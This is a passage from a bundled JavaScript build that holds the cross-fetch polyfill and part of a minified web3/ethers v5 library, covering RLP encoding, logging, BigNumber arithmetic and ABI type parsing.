        Body.call(Request.prototype);
        function Response(bodyInit, options) {
            if (!options) options = {};
            this.type = "default";
            this.status = options.status === undefined ? 200 : options.status;
            this.ok = this.status >= 200 && this.status < 300;
            this.statusText = "statusText" in options ? options.statusText : "OK";
            this.headers = new Headers(options.headers);
            this.url = options.url || "";
            this._initBody(bodyInit);
        }
        Body.call(Response.prototype);
        Response.prototype.clone = function() {
            return new Response(this._bodyInit, {
                status: this.status,
                statusText: this.statusText,
                headers: new Headers(this.headers),
                url: this.url
            });
        };
        Response.error = function() {
            var response = new Response(null, {
                status: 0,
                statusText: ""
            });
            response.type = "error";
            return response;
        };
        var redirectStatuses = [
            301,
            302,
            303,
            307,
            308
        ];
        Response.redirect = function(url, status) {
            if (redirectStatuses.indexOf(status) === -1) throw new RangeError("Invalid status code");
            return new Response(null, {
                status: status,
                headers: {
                    location: url
                }
            });
        };
        exports1.DOMException = self1.DOMException;
        try {
            new exports1.DOMException();
        } catch (err) {
            exports1.DOMException = function(message, name) {
                this.message = message;
                this.name = name;
                var error = Error(message);
                this.stack = error.stack;
            };
            exports1.DOMException.prototype = Object.create(Error.prototype);
            exports1.DOMException.prototype.constructor = exports1.DOMException;
        }
        function fetch(input, init) {
            return new Promise(function(resolve, reject) {
                var request = new Request(input, init);
                if (request.signal && request.signal.aborted) return reject(new exports1.DOMException("Aborted", "AbortError"));
                var xhr = new XMLHttpRequest();
                function abortXhr() {
                    xhr.abort();
                }
                xhr.onload = function() {
                    var options = {
                        status: xhr.status,
                        statusText: xhr.statusText,
                        headers: parseHeaders(xhr.getAllResponseHeaders() || "")
                    };
                    options.url = "responseURL" in xhr ? xhr.responseURL : options.headers.get("X-Request-URL");
                    var body = "response" in xhr ? xhr.response : xhr.responseText;
                    resolve(new Response(body, options));
                };
                xhr.onerror = function() {
                    reject(new TypeError("Network request failed"));
                };
                xhr.ontimeout = function() {
                    reject(new TypeError("Network request failed"));
                };
                xhr.onabort = function() {
                    reject(new exports1.DOMException("Aborted", "AbortError"));
                };
                xhr.open(request.method, request.url, true);
                if (request.credentials === "include") xhr.withCredentials = true;
                else if (request.credentials === "omit") xhr.withCredentials = false;
                if ("responseType" in xhr && support.blob) xhr.responseType = "blob";
                request.headers.forEach(function(value, name) {
                    xhr.setRequestHeader(name, value);
                });
                if (request.signal) {
                    request.signal.addEventListener("abort", abortXhr);
                    xhr.onreadystatechange = function() {
                        // DONE (success or failure)
                        if (xhr.readyState === 4) request.signal.removeEventListener("abort", abortXhr);
                    };
                }
                xhr.send(typeof request._bodyInit === "undefined" ? null : request._bodyInit);
            });
        }
        fetch.polyfill = true;
        if (!self1.fetch) {
            self1.fetch = fetch;
            self1.Headers = Headers;
            self1.Request = Request;
            self1.Response = Response;
        }
        exports1.Headers = Headers;
        exports1.Request = Request;
        exports1.Response = Response;
        exports1.fetch = fetch;
        Object.defineProperty(exports1, "__esModule", {
            value: true
        });
        return exports1;
    }({});
})(__self__);
__self__.fetch.ponyfill = true;
// Remove "polyfill" property added by whatwg-fetch
delete __self__.fetch.polyfill;
// Choose between native implementation (global) or custom implementation (__self__)
// var ctx = global.fetch ? global : __self__;
var ctx = __self__; // this line disable service worker support temporarily
exports = ctx.fetch // To enable: import fetch from 'cross-fetch'
;
exports.default = ctx.fetch // For TypeScript consumers without esModuleInterop.
;
exports.fetch = ctx.fetch // To enable: import {fetch} from 'cross-fetch'
;
exports.Headers = ctx.Headers;
exports.Request = ctx.Request;
exports.Response = ctx.Response;
module.exports = exports;

});

parcelRequire.register("yQvku", function(module, exports) {

module.exports = import("./" + (parcelRequire("27Lyk")).resolve("jicEo")).then(()=>parcelRequire("lUOEJ"));

});

var $2c4ca49181ee4a21$exports = {};
/*! For license information please see web3.min.js.LICENSE.txt */ !function(e, t) {
    $2c4ca49181ee4a21$exports = t();
}($2c4ca49181ee4a21$exports, ()=>(()=>{
        var e = {
            7256: (e, t)=>{
                "use strict";
                function r(e) {
                    if (Array.isArray(e)) {
                        const t = [];
                        let n = 0;
                        for(let i = 0; i < e.length; i++){
                            const o = r(e[i]);
                            t.push(o), n += o.length;
                        }
                        return h(o(n, 192), ...t);
                    }
                    const t = g(e);
                    return 1 === t.length && t[0] < 128 ? t : h(o(t.length, 128), t);
                }
                function n(e, t, r) {
                    if (r > e.length) throw new Error("invalid RLP (safeSlice): end slice of Uint8Array out-of-bounds");
                    return e.slice(t, r);
                }
                function i(e) {
                    if (0 === e[0]) throw new Error("invalid RLP: extra zeros");
                    return l(c(e));
                }
                function o(e, t) {
                    if (e < 56) return Uint8Array.from([
                        e + t
                    ]);
                    const r = p(e), n = p(t + 55 + r.length / 2);
                    return Uint8Array.from(d(n + r));
                }
                function s(e, t = !1) {
                    if (null == e || 0 === e.length) return Uint8Array.from([]);
                    const r = a(g(e));
                    if (t) return r;
                    if (0 !== r.remainder.length) throw new Error("invalid RLP: remainder must be zero");
                    return r.data;
                }
                function a(e) {
                    let t, r, o, s, u;
                    const c = [], l = e[0];
                    if (l <= 127) return {
                        data: e.slice(0, 1),
                        remainder: e.slice(1)
                    };
                    if (l <= 183) {
                        if (t = l - 127, o = 128 === l ? Uint8Array.from([]) : n(e, 1, t), 2 === t && o[0] < 128) throw new Error("invalid RLP encoding: invalid prefix, single byte < 0x80 are not prefixed");
                        return {
                            data: o,
                            remainder: e.slice(t)
                        };
                    }
                    if (l <= 191) {
                        if (r = l - 182, e.length - 1 < r) throw new Error("invalid RLP: not enough bytes for string length");
                        if (t = i(n(e, 1, r)), t <= 55) throw new Error("invalid RLP: expected string length to be greater than 55");
                        return o = n(e, r, t + r), {
                            data: o,
                            remainder: e.slice(t + r)
                        };
                    }
                    if (l <= 247) {
                        for(t = l - 191, s = n(e, 1, t); s.length;)u = a(s), c.push(u.data), s = u.remainder;
                        return {
                            data: c,
                            remainder: e.slice(t)
                        };
                    }
                    {
                        if (r = l - 246, t = i(n(e, 1, r)), t < 56) throw new Error("invalid RLP: encoded list too short");
                        const o = r + t;
                        if (o > e.length) throw new Error("invalid RLP: total length is larger than the data");
                        for(s = n(e, r, o); s.length;)u = a(s), c.push(u.data), s = u.remainder;
                        return {
                            data: c,
                            remainder: e.slice(o)
                        };
                    }
                }
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.RLP = t.utils = t.decode = t.encode = void 0, t.encode = r, t.decode = s;
                const u = Array.from({
                    length: 256
                }, (e, t)=>t.toString(16).padStart(2, "0"));
                function c(e) {
                    let t = "";
                    for(let r = 0; r < e.length; r++)t += u[e[r]];
                    return t;
                }
                function l(e) {
                    const t = Number.parseInt(e, 16);
                    if (Number.isNaN(t)) throw new Error("Invalid byte sequence");
                    return t;
                }
                function d(e) {
                    if ("string" != typeof e) throw new TypeError("hexToBytes: expected string, got " + typeof e);
                    if (e.length % 2) throw new Error("hexToBytes: received invalid unpadded hex");
                    const t = new Uint8Array(e.length / 2);
                    for(let r = 0; r < t.length; r++){
                        const n = 2 * r;
                        t[r] = l(e.slice(n, n + 2));
                    }
                    return t;
                }
                function h(...e) {
                    if (1 === e.length) return e[0];
                    const t = e.reduce((e, t)=>e + t.length, 0), r = new Uint8Array(t);
                    for(let t = 0, n = 0; t < e.length; t++){
                        const i = e[t];
                        r.set(i, n), n += i.length;
                    }
                    return r;
                }
                function f(e) {
                    return (new TextEncoder).encode(e);
                }
                function p(e) {
                    if (e < 0) throw new Error("Invalid integer as argument, must be unsigned!");
                    const t = e.toString(16);
                    return t.length % 2 ? `0${t}` : t;
                }
                function m(e) {
                    return e.length >= 2 && "0" === e[0] && "x" === e[1];
                }
                function g(e) {
                    if (e instanceof Uint8Array) return e;
                    if ("string" == typeof e) return m(e) ? d((t = "string" != typeof (r = e) ? r : m(r) ? r.slice(2) : r).length % 2 ? `0${t}` : t) : f(e);
                    var t, r;
                    if ("number" == typeof e || "bigint" == typeof e) return e ? d(p(e)) : Uint8Array.from([]);
                    if (null == e) return Uint8Array.from([]);
                    throw new Error("toBytes: received unsupported type " + typeof e);
                }
                t.utils = {
                    bytesToHex: c,
                    concatBytes: h,
                    hexToBytes: d,
                    utf8ToBytes: f
                }, t.RLP = {
                    encode: r,
                    decode: s
                };
            },
            3260: (e, t, r)=>{
                "use strict";
                r.r(t), r.d(t, {
                    AbiCoder: ()=>rt,
                    ConstructorFragment: ()=>se,
                    ErrorFragment: ()=>ce,
                    EventFragment: ()=>re,
                    FormatTypes: ()=>Y,
                    Fragment: ()=>te,
                    FunctionFragment: ()=>ae,
                    Indexed: ()=>ct,
                    Interface: ()=>ht,
                    LogDescription: ()=>st,
                    ParamType: ()=>$,
                    TransactionDescription: ()=>at,
                    checkResultErrors: ()=>me,
                    defaultAbiCoder: ()=>nt
                });
                var n = r(4269), i = r.n(n);
                let o = !1, s = !1;
                const a = {
                    debug: 1,
                    default: 2,
                    info: 2,
                    warning: 3,
                    error: 4,
                    off: 5
                };
                let u = a.default, c = null;
                const l = function() {
                    try {
                        const e = [];
                        if ([
                            "NFD",
                            "NFC",
                            "NFKD",
                            "NFKC"
                        ].forEach((t)=>{
                            try {
                                if ("test" !== "test".normalize(t)) throw new Error("bad normalize");
                            } catch (r) {
                                e.push(t);
                            }
                        }), e.length) throw new Error("missing " + e.join(", "));
                        if (String.fromCharCode(233).normalize("NFD") !== String.fromCharCode(101, 769)) throw new Error("broken implementation");
                    } catch (e) {
                        return e.message;
                    }
                    return null;
                }();
                var d, h;
                !function(e) {
                    e.DEBUG = "DEBUG", e.INFO = "INFO", e.WARNING = "WARNING", e.ERROR = "ERROR", e.OFF = "OFF";
                }(d || (d = {})), function(e) {
                    e.UNKNOWN_ERROR = "UNKNOWN_ERROR", e.NOT_IMPLEMENTED = "NOT_IMPLEMENTED", e.UNSUPPORTED_OPERATION = "UNSUPPORTED_OPERATION", e.NETWORK_ERROR = "NETWORK_ERROR", e.SERVER_ERROR = "SERVER_ERROR", e.TIMEOUT = "TIMEOUT", e.BUFFER_OVERRUN = "BUFFER_OVERRUN", e.NUMERIC_FAULT = "NUMERIC_FAULT", e.MISSING_NEW = "MISSING_NEW", e.INVALID_ARGUMENT = "INVALID_ARGUMENT", e.MISSING_ARGUMENT = "MISSING_ARGUMENT", e.UNEXPECTED_ARGUMENT = "UNEXPECTED_ARGUMENT", e.CALL_EXCEPTION = "CALL_EXCEPTION", e.INSUFFICIENT_FUNDS = "INSUFFICIENT_FUNDS", e.NONCE_EXPIRED = "NONCE_EXPIRED", e.REPLACEMENT_UNDERPRICED = "REPLACEMENT_UNDERPRICED", e.UNPREDICTABLE_GAS_LIMIT = "UNPREDICTABLE_GAS_LIMIT", e.TRANSACTION_REPLACED = "TRANSACTION_REPLACED", e.ACTION_REJECTED = "ACTION_REJECTED";
                }(h || (h = {}));
                const f = "0123456789abcdef";
                class p {
                    constructor(e){
                        Object.defineProperty(this, "version", {
                            enumerable: !0,
                            value: e,
                            writable: !1
                        });
                    }
                    _log(e, t) {
                        const r = e.toLowerCase();
                        null == a[r] && this.throwArgumentError("invalid log level name", "logLevel", e), u > a[r] || console.log.apply(console, t);
                    }
                    debug(...e) {
                        this._log(p.levels.DEBUG, e);
                    }
                    info(...e) {
                        this._log(p.levels.INFO, e);
                    }
                    warn(...e) {
                        this._log(p.levels.WARNING, e);
                    }
                    makeError(e, t, r) {
                        if (s) return this.makeError("censored error", t, {});
                        t || (t = p.errors.UNKNOWN_ERROR), r || (r = {});
                        const n = [];
                        Object.keys(r).forEach((e)=>{
                            const t = r[e];
                            try {
                                if (t instanceof Uint8Array) {
                                    let r = "";
                                    for(let e = 0; e < t.length; e++)r += f[t[e] >> 4], r += f[15 & t[e]];
                                    n.push(e + "=Uint8Array(0x" + r + ")");
                                } else n.push(e + "=" + JSON.stringify(t));
                            } catch (t) {
                                n.push(e + "=" + JSON.stringify(r[e].toString()));
                            }
                        }), n.push(`code=${t}`), n.push(`version=${this.version}`);
                        const i = e;
                        let o = "";
                        switch(t){
                            case h.NUMERIC_FAULT:
                                {
                                    o = "NUMERIC_FAULT";
                                    const t = e;
                                    switch(t){
                                        case "overflow":
                                        case "underflow":
                                        case "division-by-zero":
                                            o += "-" + t;
                                            break;
                                        case "negative-power":
                                        case "negative-width":
                                            o += "-unsupported";
                                            break;
                                        case "unbound-bitwise-result":
                                            o += "-unbound-result";
                                    }
                                    break;
                                }
                            case h.CALL_EXCEPTION:
                            case h.INSUFFICIENT_FUNDS:
                            case h.MISSING_NEW:
                            case h.NONCE_EXPIRED:
                            case h.REPLACEMENT_UNDERPRICED:
                            case h.TRANSACTION_REPLACED:
                            case h.UNPREDICTABLE_GAS_LIMIT:
                                o = t;
                        }
                        o && (e += " [ See: https://links.ethers.org/v5-errors-" + o + " ]"), n.length && (e += " (" + n.join(", ") + ")");
                        const a = new Error(e);
                        return a.reason = i, a.code = t, Object.keys(r).forEach(function(e) {
                            a[e] = r[e];
                        }), a;
                    }
                    throwError(e, t, r) {
                        throw this.makeError(e, t, r);
                    }
                    throwArgumentError(e, t, r) {
                        return this.throwError(e, p.errors.INVALID_ARGUMENT, {
                            argument: t,
                            value: r
                        });
                    }
                    assert(e, t, r, n) {
                        e || this.throwError(t, r, n);
                    }
                    assertArgument(e, t, r, n) {
                        e || this.throwArgumentError(t, r, n);
                    }
                    checkNormalize(e) {
                        null == e && (e = "platform missing String.prototype.normalize"), l && this.throwError("platform missing String.prototype.normalize", p.errors.UNSUPPORTED_OPERATION, {
                            operation: "String.prototype.normalize",
                            form: l
                        });
                    }
                    checkSafeUint53(e, t) {
                        "number" == typeof e && (null == t && (t = "value not safe"), (e < 0 || e >= 9007199254740991) && this.throwError(t, p.errors.NUMERIC_FAULT, {
                            operation: "checkSafeInteger",
                            fault: "out-of-safe-range",
                            value: e
                        }), e % 1 && this.throwError(t, p.errors.NUMERIC_FAULT, {
                            operation: "checkSafeInteger",
                            fault: "non-integer",
                            value: e
                        }));
                    }
                    checkArgumentCount(e, t, r) {
                        r = r ? ": " + r : "", e < t && this.throwError("missing argument" + r, p.errors.MISSING_ARGUMENT, {
                            count: e,
                            expectedCount: t
                        }), e > t && this.throwError("too many arguments" + r, p.errors.UNEXPECTED_ARGUMENT, {
                            count: e,
                            expectedCount: t
                        });
                    }
                    checkNew(e, t) {
                        e !== Object && null != e || this.throwError("missing new", p.errors.MISSING_NEW, {
                            name: t.name
                        });
                    }
                    checkAbstract(e, t) {
                        e === t ? this.throwError("cannot instantiate abstract class " + JSON.stringify(t.name) + " directly; use a sub-class", p.errors.UNSUPPORTED_OPERATION, {
                            name: e.name,
                            operation: "new"
                        }) : e !== Object && null != e || this.throwError("missing new", p.errors.MISSING_NEW, {
                            name: t.name
                        });
                    }
                    static globalLogger() {
                        return c || (c = new p("logger/5.7.0")), c;
                    }
                    static setCensorship(e, t) {
                        if (!e && t && this.globalLogger().throwError("cannot permanently disable censorship", p.errors.UNSUPPORTED_OPERATION, {
                            operation: "setCensorship"
                        }), o) {
                            if (!e) return;
                            this.globalLogger().throwError("error censorship permanent", p.errors.UNSUPPORTED_OPERATION, {
                                operation: "setCensorship"
                            });
                        }
                        s = !!e, o = !!t;
                    }
                    static setLogLevel(e) {
                        const t = a[e.toLowerCase()];
                        null != t ? u = t : p.globalLogger().warn("invalid log level - " + e);
                    }
                    static from(e) {
                        return new p(e);
                    }
                }
                p.errors = h, p.levels = d;
                const m = new p("bytes/5.7.0");
                function g(e) {
                    return !!e.toHexString;
                }
                function y(e) {
                    return e.slice || (e.slice = function() {
                        const t = Array.prototype.slice.call(arguments);
                        return y(new Uint8Array(Array.prototype.slice.apply(e, t)));
                    }), e;
                }
                function v(e) {
                    return "number" == typeof e && e == e && e % 1 == 0;
                }
                function b(e) {
                    if (null == e) return !1;
                    if (e.constructor === Uint8Array) return !0;
                    if ("string" == typeof e) return !1;
                    if (!v(e.length) || e.length < 0) return !1;
                    for(let t = 0; t < e.length; t++){
                        const r = e[t];
                        if (!v(r) || r < 0 || r >= 256) return !1;
                    }
                    return !0;
                }
                function E(e, t) {
                    if (t || (t = {}), "number" == typeof e) {
                        m.checkSafeUint53(e, "invalid arrayify value");
                        const t = [];
                        for(; e;)t.unshift(255 & e), e = parseInt(String(e / 256));
                        return 0 === t.length && t.push(0), y(new Uint8Array(t));
                    }
                    if (t.allowMissingPrefix && "string" == typeof e && "0x" !== e.substring(0, 2) && (e = "0x" + e), g(e) && (e = e.toHexString()), _(e)) {
                        let r = e.substring(2);
                        r.length % 2 && ("left" === t.hexPad ? r = "0" + r : "right" === t.hexPad ? r += "0" : m.throwArgumentError("hex data is odd-length", "value", e));
                        const n = [];
                        for(let e = 0; e < r.length; e += 2)n.push(parseInt(r.substring(e, e + 2), 16));
                        return y(new Uint8Array(n));
                    }
                    return b(e) ? y(new Uint8Array(e)) : m.throwArgumentError("invalid arrayify value", "value", e);
                }
                function A(e) {
                    const t = e.map((e)=>E(e)), r = t.reduce((e, t)=>e + t.length, 0), n = new Uint8Array(r);
                    return t.reduce((e, t)=>(n.set(t, e), e + t.length), 0), y(n);
                }
                function _(e, t) {
                    return !("string" != typeof e || !e.match(/^0x[0-9A-Fa-f]*$/) || t && e.length !== 2 + 2 * t);
                }
                const w = "0123456789abcdef";
                function T(e, t) {
                    if (t || (t = {}), "number" == typeof e) {
                        m.checkSafeUint53(e, "invalid hexlify value");
                        let t = "";
                        for(; e;)t = w[15 & e] + t, e = Math.floor(e / 16);
                        return t.length ? (t.length % 2 && (t = "0" + t), "0x" + t) : "0x00";
                    }
                    if ("bigint" == typeof e) return (e = e.toString(16)).length % 2 ? "0x0" + e : "0x" + e;
                    if (t.allowMissingPrefix && "string" == typeof e && "0x" !== e.substring(0, 2) && (e = "0x" + e), g(e)) return e.toHexString();
                    if (_(e)) return e.length % 2 && ("left" === t.hexPad ? e = "0x0" + e.substring(2) : "right" === t.hexPad ? e += "0" : m.throwArgumentError("hex data is odd-length", "value", e)), e.toLowerCase();
                    if (b(e)) {
                        let t = "0x";
                        for(let r = 0; r < e.length; r++){
                            let n = e[r];
                            t += w[(240 & n) >> 4] + w[15 & n];
                        }
                        return t;
                    }
                    return m.throwArgumentError("invalid hexlify value", "value", e);
                }
                function R(e, t) {
                    for("string" != typeof e ? e = T(e) : _(e) || m.throwArgumentError("invalid hex string", "value", e), e.length > 2 * t + 2 && m.throwArgumentError("value out of range", "value", arguments[1]); e.length < 2 * t + 2;)e = "0x0" + e.substring(2);
                    return e;
                }
                var I = i().BN;
                const S = new p("bignumber/5.7.0"), P = {}, O = 9007199254740991;
                let x = !1;
                class M {
                    constructor(e, t){
                        e !== P && S.throwError("cannot call constructor directly; use BigNumber.from", p.errors.UNSUPPORTED_OPERATION, {
                            operation: "new (BigNumber)"
                        }), this._hex = t, this._isBigNumber = !0, Object.freeze(this);
                    }
                    fromTwos(e) {
                        return N(C(this).fromTwos(e));
                    }
                    toTwos(e) {
                        return N(C(this).toTwos(e));
                    }
                    abs() {
                        return "-" === this._hex[0] ? M.from(this._hex.substring(1)) : this;
                    }
                    add(e) {
                        return N(C(this).add(C(e)));
                    }
                    sub(e) {
                        return N(C(this).sub(C(e)));
                    }
                    div(e) {
                        return M.from(e).isZero() && k("division-by-zero", "div"), N(C(this).div(C(e)));
                    }
                    mul(e) {
                        return N(C(this).mul(C(e)));
                    }
                    mod(e) {
                        const t = C(e);
                        return t.isNeg() && k("division-by-zero", "mod"), N(C(this).umod(t));
                    }
                    pow(e) {
                        const t = C(e);
                        return t.isNeg() && k("negative-power", "pow"), N(C(this).pow(t));
                    }
                    and(e) {
                        const t = C(e);
                        return (this.isNegative() || t.isNeg()) && k("unbound-bitwise-result", "and"), N(C(this).and(t));
                    }
                    or(e) {
                        const t = C(e);
                        return (this.isNegative() || t.isNeg()) && k("unbound-bitwise-result", "or"), N(C(this).or(t));
                    }
                    xor(e) {
                        const t = C(e);
                        return (this.isNegative() || t.isNeg()) && k("unbound-bitwise-result", "xor"), N(C(this).xor(t));
                    }
                    mask(e) {
                        return (this.isNegative() || e < 0) && k("negative-width", "mask"), N(C(this).maskn(e));
                    }
                    shl(e) {
                        return (this.isNegative() || e < 0) && k("negative-width", "shl"), N(C(this).shln(e));
                    }
                    shr(e) {
                        return (this.isNegative() || e < 0) && k("negative-width", "shr"), N(C(this).shrn(e));
                    }
                    eq(e) {
                        return C(this).eq(C(e));
                    }
                    lt(e) {
                        return C(this).lt(C(e));
                    }
                    lte(e) {
                        return C(this).lte(C(e));
                    }
                    gt(e) {
                        return C(this).gt(C(e));
                    }
                    gte(e) {
                        return C(this).gte(C(e));
                    }
                    isNegative() {
                        return "-" === this._hex[0];
                    }
                    isZero() {
                        return C(this).isZero();
                    }
                    toNumber() {
                        try {
                            return C(this).toNumber();
                        } catch (e) {
                            k("overflow", "toNumber", this.toString());
                        }
                        return null;
                    }
                    toBigInt() {
                        try {
                            return BigInt(this.toString());
                        } catch (e) {}
                        return S.throwError("this platform does not support BigInt", p.errors.UNSUPPORTED_OPERATION, {
                            value: this.toString()
                        });
                    }
                    toString() {
                        return arguments.length > 0 && (10 === arguments[0] ? x || (x = !0, S.warn("BigNumber.toString does not accept any parameters; base-10 is assumed")) : 16 === arguments[0] ? S.throwError("BigNumber.toString does not accept any parameters; use bigNumber.toHexString()", p.errors.UNEXPECTED_ARGUMENT, {}) : S.throwError("BigNumber.toString does not accept parameters", p.errors.UNEXPECTED_ARGUMENT, {})), C(this).toString(10);
                    }
                    toHexString() {
                        return this._hex;
                    }
                    toJSON(e) {
                        return {
                            type: "BigNumber",
                            hex: this.toHexString()
                        };
                    }
                    static from(e) {
                        if (e instanceof M) return e;
                        if ("string" == typeof e) return e.match(/^-?0x[0-9a-f]+$/i) ? new M(P, B(e)) : e.match(/^-?[0-9]+$/) ? new M(P, B(new I(e))) : S.throwArgumentError("invalid BigNumber string", "value", e);
                        if ("number" == typeof e) return e % 1 && k("underflow", "BigNumber.from", e), (e >= O || e <= -O) && k("overflow", "BigNumber.from", e), M.from(String(e));
                        const t = e;
                        if ("bigint" == typeof t) return M.from(t.toString());
                        if (b(t)) return M.from(T(t));
                        if (t) {
                            if (t.toHexString) {
                                const e = t.toHexString();
                                if ("string" == typeof e) return M.from(e);
                            } else {
                                let e = t._hex;
                                if (null == e && "BigNumber" === t.type && (e = t.hex), "string" == typeof e && (_(e) || "-" === e[0] && _(e.substring(1)))) return M.from(e);
                            }
                        }
                        return S.throwArgumentError("invalid BigNumber value", "value", e);
                    }
                    static isBigNumber(e) {
                        return !(!e || !e._isBigNumber);
                    }
                }
                function B(e) {
                    if ("string" != typeof e) return B(e.toString(16));
                    if ("-" === e[0]) return "-" === (e = e.substring(1))[0] && S.throwArgumentError("invalid hex", "value", e), "0x00" === (e = B(e)) ? e : "-" + e;
                    if ("0x" !== e.substring(0, 2) && (e = "0x" + e), "0x" === e) return "0x00";
                    for(e.length % 2 && (e = "0x0" + e.substring(2)); e.length > 4 && "0x00" === e.substring(0, 4);)e = "0x" + e.substring(4);
                    return e;
                }
                function N(e) {
                    return M.from(B(e));
                }
                function C(e) {
                    const t = M.from(e).toHexString();
                    return "-" === t[0] ? new I("-" + t.substring(3), 16) : new I(t.substring(2), 16);
                }
                function k(e, t, r) {
                    const n = {
                        fault: e,
                        operation: t
                    };
                    return null != r && (n.value = r), S.throwError(e, p.errors.NUMERIC_FAULT, n);
                }
                const L = new p("properties/5.7.0");
                function F(e, t, r) {
                    Object.defineProperty(e, t, {
                        enumerable: !0,
                        value: r,
                        writable: !1
                    });
                }
                function D(e, t) {
                    for(let r = 0; r < 32; r++){
                        if (e[t]) return e[t];
                        if (!e.prototype || "object" != typeof e.prototype) break;
                        e = Object.getPrototypeOf(e.prototype).constructor;
                    }
                    return null;
                }
                const j = {
                    bigint: !0,
                    boolean: !0,
                    function: !0,
                    number: !0,
                    string: !0
                };
                function U(e) {
                    if (null == e || j[typeof e]) return !0;
                    if (Array.isArray(e) || "object" == typeof e) {
                        if (!Object.isFrozen(e)) return !1;
                        const t = Object.keys(e);
                        for(let r = 0; r < t.length; r++){
                            let n = null;
                            try {
                                n = e[t[r]];
                            } catch (e) {
                                continue;
                            }
                            if (!U(n)) return !1;
                        }
                        return !0;
                    }
                    return L.throwArgumentError("Cannot deepCopy " + typeof e, "object", e);
                }
                function H(e) {
                    if (U(e)) return e;
                    if (Array.isArray(e)) return Object.freeze(e.map((e)=>G(e)));
                    if ("object" == typeof e) {
                        const t = {};
                        for(const r in e){
                            const n = e[r];
                            void 0 !== n && F(t, r, G(n));
                        }
                        return t;
                    }
                    return L.throwArgumentError("Cannot deepCopy " + typeof e, "object", e);
                }
                function G(e) {
                    return H(e);
                }
                class V {
                    constructor(e){
                        for(const t in e)this[t] = G(e[t]);
                    }
                }
                const W = "abi/5.7.0", q = new p(W), z = {};
                let Q = {
                    calldata: !0,
                    memory: !0,
                    storage: !0
                }, K = {
                    calldata: !0,
                    memory: !0
                };
                function J(e, t) {
                    if ("bytes" === e || "string" === e) {
                        if (Q[t]) return !0;
                    } else if ("address" === e) {
                        if ("payable" === t) return !0;
                    } else if ((e.indexOf("[") >= 0 || "tuple" === e) && K[t]) return !0;
                    return (Q[t] || "payable" === t) && q.throwArgumentError("invalid modifier", "name", t), !1;
                }
                function X(e, t) {
                    for(let r in t)F(e, r, t[r]);
                }
                const Y = Object.freeze({
                    sighash: "sighash",
                    minimal: "minimal",
                    full: "full",
                    json: "json"
                }), Z = new RegExp(/^(.*)\[([0-9]*)\]$/);
                class $ {
                    constructor(e, t){
                        e !== z && q.throwError("use fromString", p.errors.UNSUPPORTED_OPERATION, {
                            operation: "new ParamType()"
                        }), X(this, t);
                        let r = this.type.match(Z);
                        X(this, r ? {
                            arrayLength: parseInt(r[2] || "-1"),
                            arrayChildren: $.fromObject({
                                type: r[1],
                                components: this.components
                            }),
                            baseType: "array"
                        } : {
                            arrayLength: null,
                            arrayChildren: null,
                            baseType: null != this.components ? "tuple" : this.type
                        }), this._isParamType = !0, Object.freeze(this);
                    }
                    format(e) {
                        if (e || (e = Y.sighash), Y[e] || q.throwArgumentError("invalid format type", "format", e), e === Y.json) {
                            let t = {
                                type: "tuple" === this.baseType ? "tuple" : this.type,
                                name: this.name || void 0
                            };
                            return "boolean" == typeof this.indexed && (t.indexed = this.indexed), this.components && (t.components = this.components.map((t)=>JSON.parse(t.format(e)))), JSON.stringify(t);
                        }
                        let t = "";
                        return "array" === this.baseType ? (t += this.arrayChildren.format(e), t += "[" + (this.arrayLength < 0 ? "" : String(this.arrayLength)) + "]") : "tuple" === this.baseType ? (e !== Y.sighash && (t += this.type), t += "(" + this.components.map((t)=>t.format(e)).join(e === Y.full ? ", " : ",") + ")") : t += this.type, e !== Y.sighash && (!0 === this.indexed && (t += " indexed"), e === Y.full && this.name && (t += " " + this.name)), t;
                    }
                    static from(e, t) {
                        return "string" == typeof e ? $.fromString(e, t) : $.fromObject(e);
                    }
                    static fromObject(e) {
                        return $.isParamType(e) ? e : new $(z, {
                            name: e.name || null,
                            type: le(e.type),
                            indexed: null == e.indexed ? null : !!e.indexed,
                            components: e.components ? e.components.map($.fromObject) : null
                        });
                    }
                    static fromString(e, t) {
                        var r;
                        return r = function(e, t) {
                            let r = e;
                            function n(t) {
                                q.throwArgumentError(`unexpected character at position ${t}`, "param", e);
                            }
                            function i(e) {
                                let r = {
                                    type: "",
                                    name: "",
                                    parent: e,
                                    state: {
                                        allowType: !0
                                    }
                                };
                                return t && (r.indexed = !1), r;
                            }
                            e = e.replace(/\s/g, " ");
                            let o = {
                                type: "",
                                name: "",
                                state: {
                                    allowType: !0
                                }
                            }, s = o;
                            for(let r = 0; r < e.length; r++){
                                let o = e[r];
                                switch(o){
                                    case "(":
                                        s.state.allowType && "" === s.type ? s.type = "tuple" : s.state.allowParams || n(r), s.state.allowType = !1, s.type = le(s.type), s.components = [
                                            i(s)
                                        ], s = s.components[0];
                                        break;
                                    case ")":
                                        delete s.state, "indexed" === s.name && (t || n(r), s.indexed = !0, s.name = ""), J(s.type, s.name) && (s.name = ""), s.type = le(s.type);
                                        let e1 = s;
                                        s = s.parent, s || n(r), delete e1.parent, s.state.allowParams = !1, s.state.allowName = !0, s.state.allowArray = !0;
                                        break;
                                    case ",":
                                        delete s.state, "indexed" === s.name && (t || n(r), s.indexed = !0, s.name = ""), J(s.type, s.name) && (s.name = ""), s.type = le(s.type);
                                        let a = i(s.parent);
                                        s.parent.components.push(a), delete s.parent, s = a;
                                        break;
                                    case " ":
                                        s.state.allowType && "" !== s.type && (s.type = le(s.type), delete s.state.allowType, s.state.allowName = !0, s.state.allowParams = !0), s.state.allowName && "" !== s.name && ("indexed" === s.name ? (t || n(r), s.indexed && n(r), s.indexed = !0, s.name = "") : J(s.type, s.name) ? s.name = "" : s.state.allowName = !1);
                                        break;
                                    case "[":
                                        s.state.allowArray || n(r), s.type += o, s.state.allowArray = !1, s.state.allowName = !1, s.state.readArray = !0;
                                        break;
                                    case "]":
                                        s.state.readArray || n(r), s.type += o, s.state.readArray = !1, s.state.allowArray = !0, s.state.allowName = !0;
                                        break;
                                    default:
                                        s.state.allowType ? (s.type += o, s.state.allowParams = !0, s.state.allowArray = !0) : s.state.allowName ? (s.name += o, delete s.state.allowArray) : s.state.readArray ? s.type += o : n(r);
                                }
                            }
                            return s.parent && q.throwArgumentError("unexpected eof", "param", e), delete o.state, "indexed" === s.name ? (t || n(r.length - 7), s.indexed && n(r.length - 7), s.indexed = !0, s.name = "") : J(s.type, s.name) && (s.name = ""), o.type = le(o.type), o;
                        }(e, !!t), $.fromObject({
                            name: r.name,
                            type: r.type,
                            indexed: r.indexed,
                            components: r.components
                        });
                    }
                    static isParamType(e) {
                        return !(null == e || !e._isParamType);
                    }
                }
                function ee(e, t) {
                    return (function(e) {
                        e = e.trim();
